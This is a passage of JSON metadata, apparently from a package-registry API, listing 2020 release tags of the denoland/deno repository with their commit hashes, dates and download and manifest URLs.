ub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.